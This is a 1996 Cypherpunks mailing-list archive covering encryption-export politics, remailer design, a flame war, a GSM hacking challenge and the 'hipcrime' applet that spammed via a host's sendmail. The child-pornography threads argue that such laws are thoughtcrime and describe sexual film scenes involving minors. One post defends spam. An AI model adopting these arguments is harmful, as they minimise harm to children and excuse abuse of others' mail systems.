>our side does not have enough votes to block all amendments.
>
>It is crucial that all netizens who consider privacy and security important
>take a moment to call members of the Commerce Committee right now and
>urge them to vote S.1726 out of committee without amendments.
>
>________________________________________________________________________
>DESCRIPTION OF S.1726, PRO-CODE BILL
>
>Privacy-enhancing encryption technology is currently under heavy restrictions
>kept in place by the White House.  Encryption that is currently allowed to
>be exported is not sufficient to protect confidential information.  This
>policy acquires an "Alice-in-Wonderland" quality when one realizes that  
>strong encryption products are available abroad both for sale and for free
>download off the Internet.
>
>The Pro-CODE Act resolves to:
>
>1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
>    encryption programs, including such products as Pretty Good Privacy and
>    popular World Wide Web browsers.
>
>2.  Requires the Secretary of Commerce to allow the less restricted export
>    of other encryption technologies if products of similar strength are
>    generally available outside the United States, roughly up to DES
>    strength.
>
>3.  Prohibits the federal government from imposing mandatory key-escrow
>    encryption policies on the domestic market and limiting the authority
>    of the Secretary of Commerce to set standards for encryption products.
>
>________________________________________________________________________
>CHRONOLOGY OF PRO-CRYPTO LEGISLATION
>
>9/12/96 (scheduled)
>Senate Commerce committee will hold markup of S.1726 and hopefully pass it
>out of committee with no amendments.
>
>7/25/96: Full Senate Commerce committee holds positive hearings on S.1726.
>FBI Director Louis Freeh testifies along with many cyber-luminaries.
>Hearings are cybercast Internet Cyber-Rights activists with HotWired
>and WWW.Crypto.Com.  You can see the photos, read the testimony, and
>listen to the audio transcript at http://www.crypto.com/events/072596/
>
>6/26/96: Senate subcommittee holds positive hearings on S.1726.  Hearings are
>cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com.
>You can see the photos, read the testimony, and listen to the audio
>transcript at http://www.crypto.com/events/062696/
>
>5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would
>free public-domain encryption software (such as PGP) for export, free much
>commercial encryption for export, and reduce the government's ability to
>push Clipper proposals down the throats of an unwilling public.  Original
>sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
>Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).
>
>3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills
>(S.1587/H.R.3011) that significantly relax export restrictions on products
>with encryption functionality in them, as well as free public domain software
>such as PGP (Pretty Good Privacy).
>
>________________________________________________________________________
>FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS
>
>There are many excellent resources online to get up to speed on crypto
>including the following WWW sites:
>
>http://www.crypto.com       http://www.privacy.org    http://www.eff.org    
>http://www.cdt.org          http://www.epic.org       http://www.vtw.org
>
>Please visit them often.
>
>The following organizations have signed onto this alert:
>
>	Center for Democracy and Technology
>	Electronic Frontier Foundation
>	Electronic Privacy Information Center
>	Voters Telecommunications Watch
>
>________________________________________________________________________
>End alert
>========================================================================
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Sep 1996 02:48:06 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
In-Reply-To: <ae5ba32805021004b044@[207.167.93.63]>
Message-ID: <7qi4TD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote:
> >tcmay@got.net (Timothy C. May) writes:
> >> I didn't call for your "expulsion." No one has been expelled in four years
> >> of the list's existence.
> >
> >However Tim has been complaining about my postings to various people I know
> >and respect. (I stopped respecting Tim years ago.)
> 
> And who might these people be? I suggest you name them, as I have not even
> mentioned your name to anyone. You don't rate a complaint from me.

E.g. Kelly Goen is one of the people who told me that Tim May's been
complaining about my alleged "spit" posts.

Note that Kelly's not on this mailing list (unlike at least two other
people who said to me that Tim complained to them off-list) and that
most of the posts Tim complains about are obvious forgeries.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 12 Sep 1996 02:59:50 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.LNX.3.94.960911135638.12738A-100000@blau.pin.de>
Message-ID: <Pine.SCO.3.93.960911111553.16740A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, Stephan Schmidt wrote:

> The German Company MobilCom wants to proove
> that the German GSM networks D1,D2 and E+ are
> secure.
> 
<snip>
> 
> If a hacker is able to phone using the number
> 0171 / 3 28 99 66 in Germany with a hacked code,
> the company will pay 100.000 DM (~65.000$) to a non
> profit organisation of the hackers choice.
> 
> Is someone able to do this ? :)

While there's dubious wisdom in trying to tell Der Polizei, "I was just
responding to an authorization that I found on the Internet that says it's
OK to phreak your phones - honest," I'd also expect to get paid a hell of
a lot more than $65 for doing a penetration test on their network.  Sixty
five bucks won't even pay the per diem, none the less a reasonable wage.
And Der Polizei is *NOT* known for having a sense of humor about anything,
at any time, with anyone.  Remember, kids, they may look like shit in
uniform, but those automatic weapons they carry are real, so's the ammo,
and they know how to use both of 'em.

And *I'll* decide if and when I want to give it to charity, just like I do
with the rest of my salary, thank you....

------------------------------------------------------------------------- 
|And if Dole wins and dies in office, they|        Mark Aldrich         |
|could just pickle him and no one would   |   GRCI INFOSEC Engineering  |
|notice.  It wouldn't be the first time we|     maldrich@grci.com       |
|had a dill-dole running the country.     | MAldrich@dockmaster.ncsc.mil|
|               -- Alan Olsen             |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 12 Sep 1996 02:56:26 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: (Fnord) Edupage, 10 September 1996
In-Reply-To: <199609110733.DAA04996@unix.asb.com>
Message-ID: <rogerohjdyq76.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


 > WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
 > [...]

Yes; and what was the problem, again? ...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 12 Sep 1996 05:35:33 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <199609111822.LAA15265@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:48 PM 9/10/96 -0700, Declan McCullagh wrote:
>On Tue, 10 Sep 1996, Timothy C. May wrote:
>
>> Q: Is a drawing of a child engaging in a sexual act an illegal item?
>
>Under the original Hatch bill, yes. Certainly under the revised one. Of 
>course, Hatch's proposal goes even farther. There's no "sex act" requirement.
>Judy Krug from the ALA testified about this, opposing Bruce Taylor.
>
>> Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old
>> illegal?
>
>Even under the original Hatch bill, yes.

It seems to me that the logic of these answers would make the movie,
"Carried Away" illegal.  According to a Boston Globe review (reprinted in
the local rag), "... his character cheats on his longtime girlfriend with a
new student who's only 17, ..."  Depending on how this is depicted in the
movie (Rated R), it seems to me that this could go over Hatch's line. 
(BTW, the review rates the movie 3 stars out of a possible 4.)


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 12 Sep 1996 05:54:19 +0800
To: cypherpunks@toad.com
Subject: Re: (Fnord) Edupage, 10 September 1996
Message-ID: <199609111822.LAA15291@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm preaching to the choir, but I can't resist.

>From Edupage, 10 September 1996:
>A leading Clinton Administration official ... Michael Nelson, who adds 
>that organized crime members are already some of the most sophisticated 
>users of computer systems and strong encryption technology.  In addition, 
>computer crackers will pose a more significant threat.

The bad guys already have strong encryption.  So why doesn't the Clinton
administration immediately press for the widespread deployment of strong
encryption to help defend us against the bad guys?


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 12 Sep 1996 08:37:44 +0800
To: cypherpunks@toad.com
Subject: Re: Child porn as thoughtcrime
Message-ID: <199609111848.LAA28393@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Chuck Thompson <chuck@nova1.net> writes:

 > The answer to the all the questions in the first set is
 > yes, in this country anyway, if they are interpreted by the
 > legal system as intending to incite illicit sexual acts,
 > fantasies or obsessions about children.  The fantasies or
 > obsessions are assumed to lead to the illegal acts.

The problem here is that they are "assumed" to do this as a
matter of inerrant scripture, in spite of quite a bit of evidence
indicating that this is not the case.

It doesn't exactly send those under 18 a positive message about
their bodies when it is suggested that capturing the slightest
overt representation of their sexuality is a crime worthy of
flaying and burning at the stake.

I agree that persons should probably be protected from working as
models or service providers in the commercial sex industry until
they reach the age of majority.  But the things that are being
proposed these days look much more like an ideological purge of
material relating to youthful sexuality than a serious attempt to
protect children.  The reasons given as justification are almost
always overly vague.

 > Well, I'd say that anyone who benefits materially from the
 > distribution of child porn is exploiting either the
 > children, the pervert or both.

The definition of "child porn" today is so excessively broad that
it tramples on the notion of protected free speech and need not
involve a "pervert."

Since the alleged sexual exploitation of children is the one
political issue no CongressRodent can afford to be seen as soft
on, it is hardly surprising that this single issue will likely be
the wedge used to successfully attack protected free speech.

 > Hold on here..  you are making an invalid comparison.  To
 > my knowledge, there is no law against speaking in favor of
 > child porn, any more than there is against speaking in favor
 > of drug usage.  It against the law to *use* either of them.

But of course we aren't really talking about "speaking in favor
of child porn." That's just the buzzword phrase used by the
opposing side to characterize any argument against their
proposals.

We are talking about the right of citizens to privately converse
with each other on any topic of their choosing, including through
the use of visual material, without government interference. This
is independent of the issue of child porn, and who is exploited
when money is made through its distribution.

 > The argument is not dependent upon whether or not actual
 > children are used, any more than whether or not an actual
 > gun is used in a robbery - the net effect is the same.
 > Children are harmed by the promotion of child porn because
 > it leads to the abuse/exploitation of kids.

This is a very vague and spurious connection, much like the
suggestion that sympathetic views towards Communism in the '50s
would lead to the overthrow of our government.  Purging all
depictions of adolescent sexuality from our society under threat
of imprisonment is hardly a prudent public safety measure.

 > Let those who believe that they have a constitutional right
 > to "keep and bear child pornography" violate the various
 > laws and see if they can prove that their constitutional
 > rights are violated by the law which proscribes such things.

Our constitution would be far better if it had a strong privacy
provision, rather than the current First Ammendment. There will
always be reasonable exceptions to the notion of absolute freedom
of speech, and in every era, people will believe that their own
pet issues, (Communism, Child Sex, Abortion Information), should
be amongst the special exceptions made.

In a country like Sweden, for instance, a constitutional
ammendment would be required to ban private possession of any
printed material in a citizen's own home.  Here, all it takes is
some grumbling by the child sex hysterics, and you can go to
prison for sitting at your kitchen table with sissors and a jar
of paste, and making a collage from selected pieces of the JC
Penney Catalog and the latest issue of Playboy.

Many so-called child porn laws are easily the silliest examples
of the "Tyranny of the Majority" and "thoughtcrime" ever to rear
their heads in modern times.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 12 Sep 1996 07:23:24 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.SCO.3.93.960911111553.16740A-100000@grctechs.va.grci.com>
Message-ID: <Pine.3.89.9609111234.A25731-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, Mark O. Aldrich wrote:

> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network.  Sixty

In Germany, the decimal point is used in place of the comma.  So, 
65.000$ would be $65,000 when you switch the notation to US figures.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.net (Matthew Ghio)
Date: Thu, 12 Sep 1996 07:51:01 +0800
To: robert@precipice.v-site.net
Subject: Re: 'robert' and his 'hipcrime' web site
In-Reply-To: <Pine.SUN.3.91.960911135757.5703A-100000@rwd.goucher.edu>
Message-ID: <199609111942.MAA18802@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Moltar Ramone <jlasser@rwd.goucher.edu> wrote:

> On Wed, 11 Sep 1996, John Anonymous MacDonald wrote:
[snip]
> > So basically this guy is a mathematician/artist trying
> > to pretend he's an anarchist.
> 
> Like... oh... I dunno... una-something... :-)  To be an "anarchist" has 
> nothing to do with violence, necessarily, though.  Ghandi was an 
> anarchist, of course, as are many other people (such as myself) who 
> disclaim violence as a tactic.
> 
> > So we have a guy, probably with an education in mathematics, who likes
> > abstract art.  Not what would generally be considered a political figure.
> > But there's something else there - something that doesn't want to be seen,
> > something that is very strongly law&order, something that doesn't
> > understand the anarchy of the net, and fears it.
> 
> Disagree strongly.  Are you aware of the source of the name 'hipcrime'?  
> It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw), 
> and describes a cynical, hipster-societal dropout philosophy (or at least 
> style) that is inclined to look at people as no more than sheep. Applying 
> this to the 'net populace is perhaps (I hesitate somewhat to apply the 
> term) misanthropic, but not necessarily law & order.  Again, unabomber 
> comparisons are obvious.

I'm not so sure about that.  I suspect in Kaczynski's case it was attention
deficit disorder and/or severe depression that drove him out into the woods
where no one would bother him - he didn't like interruptions and shunned
visitors.  Kaczynski blamed "leftists" and "technologists" for his ills and
primarally (though not exclusively) took out his rage on them.

This guy is just plain arrogent.  He believes he's right, and if you don't
agree with him and let him do whatever he wants, then to him you are
unimportant scum.  ("weak-minded soul" to quote him directly.)

What I don't understand is, why he bothered attacking the remailers.  Since
he obviously knows how to forge mail headers and write unix cgi scripts,
and he wasn't trying to conceal the source address, using the remailers
did him no good.  Also, he could have just downloaded the remailer software
and run it.  So maybe he really is Co$...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 09:23:29 +0800
To: Cypherpunks <remailer-operators@c2.org
Subject: Re: One Time Reply Blocks (was Re: strengthening remailer protocols)
Message-ID: <ae5c67e7050210044a3b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:56 PM 9/11/96, Bill Frantz wrote:

>Let me float one more hair-brained idea.  I think Tim May is right in
>saying that the most secure response technique is the one in Blacknet.
>i.e. The response are posted to some public bulletin board, and then Alice
>reads them at her leisure.
>
>I see two problems with this approach:  (1) It doesn't scale well, and (2)
>Alice's reading of the response may be detected.  (I think of the vans in
>Great Britain which listen to the local oscillator frequency of TV sets to
>find what people are watching.)

I agree that message pools have interesting scaling problems. If most
messages are in the same large pool, and lots of people are using pools,
then that pool could become very, very large. However, we are many _years_
away from this situation, and a very large number of _text_ messages (as
opposed to JPEGs) can be put in a few dozen megabytes of pool space. I
contend that many "scaling problems" turn out to be relatively unimportant,
for various reasons.

(And scaling problems should not be a reason not to deploy a simple
system...odds are that other factors will enter long before the system
breaks. The Xanadu people may have worried too much about hypertext
database scaling problems, while the more straightforward HTML/URL
hypertext scheme actually got deployed and changed the playing field
completely.)

There are also likely to be various kinds of pools, thus partly solving the
scaling problem by hierarchies.

(This could worse the traffic analysis--who is reading what--problem, though.)

On the traffic analysis problem, I also think this is overrated as a risk.
The likelihood that the TLAs could figure out which of the messages in
"alt.anonymous.messages" I am actually interested in are small. And there
are PageSat-type distribution systems, @Home-type cable distribution
systems, etc. (My DSS satellite has provisions for a digital feed...it is
reported to be coming soon.)

Reply-blocks are a _clear_ problem, while message pools have various basic
advantages.

I would worry more about scaling when volume is 1000 times what it now is.

(And digital postage solves a lot of scaling problems.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 12 Sep 1996 04:42:30 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Child Porn as Thoughtcrime
In-Reply-To: <515ldn$gfp@life.ai.mit.edu>
Message-ID: <3236F103.6201@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:

>  Not so, says Bruce Taylor, the chief architect of the CDA and a
>  professional cyber-scaremonger. The former Federal porn-prosecutor
>  believes that "not all censorship is bad."
> 
>  "Foreign countries have an obligation to restrict obscenity and child
>  pornography on the Internet by the treaty of 1911," says Taylor. "It's
>  an agreement between the states to cooperate and to use international
>  laws to prosecute obscenity." And to Taylor, books and copies of
>  Penthouse magazine can be obscene.

The status of such treaties governing internal policies is very suspect.
In the first place a great many of the countries that signed the
original
treaty will not exist. Technically neither Germany nor France exist in
that form since both have been reformed under entirely new
constitutions.

In addition it is always open to a soveriegn nation to abrogate a
treaty.
This may entail sanctions but unless the UN were involved it would be 
unlikely in the extreeme that any significant effect would be caused.
At this stage a UN resolution would seem more relevant than a treaty
from 1911 intended to entrench Victorian morality.

As a European I note that the US happily gives itself the "right" to
unilaterally withdraw from treaties of far more significance such as
SALT-II or GATT on entirely spurious grounds. The US has also withdrawn
from the World court after being found guilty of terrorist acts in 
Nicaragua. As such the likes of Bruce Taylor don't exactly have a strong
case. If the US thinks it can pick and choose amongst its international
obligations then other countries are likely to consider they have equal
rights to do so.

I don't think that kiddie porn is likely to be the breaking factor
however.
Anyone who has been following the European news will understand that
recent
events in Belgium makes that exceptionaly unlikely. I think it most 
unlikely that any President would be foolish enough to send Mr Taylor 
over to explain US demands. He is transparently disingenuous and 
conveniently ill-informed. The small town American parochialism he
represents is even less popular in Europe than in California or
amongst East coast intellectuals.


Where I see a more likely breaking point is over cannabis which many
countries are finding disproportionately expensive to control. Since 
the US is rapidly becomming the worlds largest supplier demands from
that quarter may be treated with less than full concern. Spain and
the Netherlands have both reformed their drug laws and the UK may 
well end up doing so in the long term, reform of the prostitution
laws will probably come first however.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 12 Sep 1996 08:12:29 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <199609112015.QAA01913@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 9/9/96 +0200, Stephan wrote:
>One thought : How many of you would support terrorist
>web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

But I _do_ support a terrorist web server!  My taxes pay for
CIA (odci.gov), whitehouse.gov, llnl.gov, *.mil, +1-888-ATF-FIRE ....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Thu, 12 Sep 1996 04:39:00 +0800
To: "'cypherpunks@toad.com>
Subject: Child Porn and Thought Crime
Message-ID: <v03007800ae5ca499b1f5@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain


If it is a crime to posses photograhic child pornograhy, and this crime is
tested in court., ,

Then is it a crime for a sightless person to posses  photograhic child
pornograhy? If so,
than this matter needs to be thought out some more. If no (by test of
court, paper is more or less
meaningless) than it is thought crime.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@CCMSD.chem.uga.edu>
Date: Thu, 12 Sep 1996 04:46:46 +0800
To: cypherpunks@toad.com
Subject: Re: 'robert' and his 'hipcrime' web site
In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.94.960911131749.27965G-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 11 Sep 1996, John Anonymous MacDonald wrote:

> Have you considered who is funding this "hipcrime" site?  Web sites aren't
> 
> So we have a guy, probably with an education in mathematics, who likes
> abstract art.  Not what would generally be considered a political figure.
> But there's something else there - something that doesn't want to be seen,
> something that is very strongly law&order, something that doesn't
> understand the anarchy of the net, and fears it.  Something that has the
> money to fund lots of little pet projects.  Is robert@precipice.v-site.net
> just a useful idiot who found someone who will fund his fractal creations?
> Or is he a willing participant?  I guess it doesn't matter really.

Can you say, "COINTELPRO"? Howzabout "FBI"?

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
===== For PGP public key:  finger andy@neptune.chem.uga.edu | pgp -fka =====
Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net
http://charon.chem.uga.edu/~andy    mailto:andy@CCMSD.chem.uga.edu    <}+++<



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjb1HC0jMb7JduJJAQF/FwQAmpij7GkyttnQ3zsl2PgTfMrONayo6QG1
mV+hQ7Mwmek4MdAyJum4OWCi7NMmzdseo0kNeI/1j3Yb3sdSKqOeDJe3TL5U/VQq
lftMQFF9pRVreANvFxVRUllcjZycAweliouOOGpqdEwBra1IGDFp1/gbfxyRRNVq
E9vI6pfSQI4=
=XGKk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoff White <geoffw@precipice.V-site.net>
Date: Thu, 12 Sep 1996 10:06:33 +0800
To: cypherpunks@toad.com
Subject: The saga of hipcrime's emailBot (fwd)
Message-ID: <Pine.SUN.3.91.960911132616.2251N-100000@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 11 Sep 1996 13:25:20 -0700 (PDT)
From: Geoff White <geoffw@precipice.V-site.net>
To: cyperpunks@toad.com
Cc: Geoff White <geoffw@precipice.V-site.net>,
    Stark Raving Math <robert@precipice.V-site.net>
Subject: The saga of hipcrime's emailBot

Hi Folks,

	Some of you may know me as I was once on cypherpunks about
	2 years ago, other pressing matters (like starting an ISDN
	ISP :) caused me to unsub but I've still been with you in spirit :)
	Anyway, I run Virtual Sites (v-site.net) Having been squeezed
	out of InterNex by various methods that we won't go into here.
	Anyway V-site primarily hosts web-space although we also have
	a bunch of ISDN and Frame Relay customers as well, but our primary
	business is web-hosting.  Robert of hipcrime.com is a "customer"
	of mine, actually I gave him a free account so that he could learn
	Java, CGI and other forms of web programming, I do give accounts
	to groups, organizations and people who show promise and Roberts
	fractal creations are outstanding.  anyway it's not my nature to
	be policeman and to look over the shoulder of my customers, as long
	as they don't draw attention to themselves I leave them alone.  I was
	surprised that Robert brought such attention to himself the other day.
	I fully understand where you are coming from with rgards to the 
	remailers being a "touchy situation" at best but also bear in mind
	that Robert has pointed out an important "weakness", Even though the
	website is no longer dispensing the offending applet, Javacode last
	forever, so the applets that are free will continue to work until they
	deleted. Since they reference the senmail daemon on 
	tarnover.v-site.net, the only recourse that I have is to shutdown
	the sendmail daemon but other customers rely on that daemon for
	their businesses. So what is to be done? I think this exposes 
	a serious problem with Java applets and with the remailing system.
	I'm willing to do my part to help stem the tide but bear in mind that
	this kind of thing can and will happen again unless a better
	way to guard against this type of thing is implemented.



	
					Geoff White
					WebMaster
					Virtual Sites







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Thu, 12 Sep 1996 10:32:24 +0800
To: cypherpunks@toad.com
Subject: HipCrime and Spam
Message-ID: <32372622.43F6@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


>Go downtown to City Hall and post advertisements for your website on
>all the walls and doors.  Be sure to put one on the Mayor's office and
>all the members of the City Council.  If they complain, explain to them
>why they are weak-minded souls who can't remove unwanted messages.

You guys OBVIOUSLY confuse reality with cyberspace.  Grafitti is actual
property damage.  A message in an EmailBox is long, long way from
being comparable.  Let's make use of that "education" that seems to 
make you so proud.

-- 
Security is mostly a superstition. It does not exist in nature, 
nor do the children of men as a whole experience it.  Avoiding 
danger is no safer in the long run than outright exposure. 
Life is either a daring adventure, or nothing. -- Hellen Keller




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 12 Sep 1996 10:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: Child porn as thoughtcrime
Message-ID: <199609112051.NAA25165@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:

 > It seems to me that the logic of these answers would make
 > the movie, "Carried Away" illegal.  According to a Boston
 > Globe review (reprinted in the local rag), "... his
 > character cheats on his longtime girlfriend with a new
 > student who's only 17, ..." Depending on how this is
 > depicted in the movie (Rated R), it seems to me that this
 > could go over Hatch's line. (BTW, the review rates the movie
 > 3 stars out of a possible 4.)

This is an interesting point.  There are a plethora of foreign
films, and some domestic ones, which contain frontal nudity by
persons under 18, as well as suggestions and sometimes even
fairly explicit depictions of acts such as masturbation or sex
between adolescents or (horrors) between an adolescent and an
adult.

None of these films has a rating worse than an (R) from the
censors at the MPAA, and a lot of them have glowing reviews
singing their praises by the likes of Siskel and Ebert, Judith
Crist, and John Hartl.

Paradoxically, the US Government has never prosecuted a
mainstream film under child pornography laws, evidently feeling
that this was a can of worms they didn't dare open, or at the
very least, not wanting to risk losing the case and establishing
a precedent

So while people are getting prosecuted for a grainy computer
picture they downloaded from the Internet, which some pediatric
"expert" testifies "appears to depict a minor", such glowing
cinematic moments such as the hardon comparison scene in Bernardo
Bertolucci's "1900", or Jill Clayburgh masturbating her teenage
son to orgasm in "Luna", are freely available to anyone who wants
them, and even get shown on Premium Cable to boot.  Not to
mention the child nudity in films ranging from the ancient
"Macbeth" to the adolescent boy loves boy epic "You Are Not
Alone."

Showtime must have run David Hamilton's "Tendres Cousines" at
least a zillion times when it was first released, as well as
prominently featuring it in their weekly softcore erotica slot,
even though it featured the rather explicit seduction of a 14
year old boy by an older girl, complete with nudity, flushed
cheeks, and panting orgasms.

If the Hatch bill in one form or another passes, will the
government still continue to ignore the art film market in its
quest to stamp out depictions of child sex?  How will the
artistic community react when the feds start throwing people in
jail, and burning the master prints of critically aclaimed films,
under the excuse that the mere existence of such material
"sexualizes" children and "encourages child abuse?"

Should make for some interesting court tests. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 12 Sep 1996 11:09:28 +0800
To: "schmidt@pin.de>
Subject: Re: Hacking Mobil Telephone System ?
Message-ID: <19960911210106453.AAA160@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996 14:00:24 +0200 (MET DST), Stephan Schmidt wrote:

>If a hacker is able to phone using the number
>0171 / 3 28 99 66 in Germany with a hacked code,
>the company will pay 100.000 DM (~65.000$) to a non
>profit organisation of the hackers choice.
		        ^^^^^^^^^^^^^^^^^^

I'm setting up a nonprofit organization:  The Chris Adams PentiumPRO Fund. 
Please support it!

Seems like a fake test. If they were giving out $64k to the hacker, you'd see a
LOT of intrest!  Hackers just tend not to be the most concerned with the
problems of others...

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wic@gnn.com
Date: Thu, 12 Sep 1996 10:47:32 +0800
Subject: Thanks!
Message-ID: <9609112107.AA21781@ebay.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for your message!  

As of August 1st, 1996, GNN Select has joined forces
with WebCrawler to become WebCrawler Select.

Our new URL is http://webcrawler.com/  

Submissions to WebCrawler will also be considered for
inclusion in WebCrawler Select.  The WebCrawler submission 
form is available at: 

http://webcrawler.com/WebCrawler/SubmitURLS.html

If you have a question, comment, or suggestion for us,
bypass the submission form and send us mail at 
wc@webcrawler.com .  We will get back to you as soon 
as we can.

          Best regards,
			Abbot Chambers
			Managing Editor
